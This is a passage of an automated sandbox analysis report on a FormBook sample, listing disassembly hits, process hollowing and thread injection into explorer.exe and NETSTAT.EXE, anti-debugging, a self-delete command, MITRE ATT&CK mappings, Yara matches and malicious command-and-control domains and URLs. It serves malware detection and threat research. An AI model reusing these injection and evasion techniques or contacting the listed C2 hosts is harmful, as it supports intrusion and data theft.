          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03922073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03898E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03921608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03918DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03887D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.contecoliving.com
          Source: C:\Windows\explorer.exeDomain query: www.constipationhub.com
          Source: C:\Windows\explorer.exeNetwork Connect: 69.163.220.52 80
          Source: C:\Windows\explorer.exeDomain query: www.identityofplace.com
          Source: C:\Windows\explorer.exeDomain query: www.tententacleshydro.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Users\user\Desktop\Y4U48592345670954.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DD0000
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: explorer.exe, 00000003.00000002.914350326.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.668563200.0000000005E50000.00000004.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery141Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383918 Sample: Y4U48592345670954.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 Y4U48592345670954.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\...\yow0w7y8ovyw.dll, PE32 10->28 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Contains functionality to prevent local Windows debugging 10->60 14 Y4U48592345670954.exe 10->14         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.contecoliving.com 69.163.220.52, 49760, 80 DREAMHOST-ASUS United States 17->30 32 www.tententacleshydro.com 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses netstat to query active network connections and open ports 17->46 21 NETSTAT.EXE 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Y4U48592345670954.exe17%VirustotalBrowse
          Y4U48592345670954.exe17%ReversingLabsWin32.Trojan.Injexa

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll6%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.Y4U48592345670954.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.NETSTAT.EXE.32fe660.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.Y4U48592345670954.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.NETSTAT.EXE.3d6f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Y4U48592345670954.exe.2850000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          tententacleshydro.com4%VirustotalBrowse
          www.contecoliving.com0%VirustotalBrowse
          constipationhub.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.middlehambooks.com/klf/0%Avira URL Cloudsafe
          http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up100%Avira URL Cloudmalware
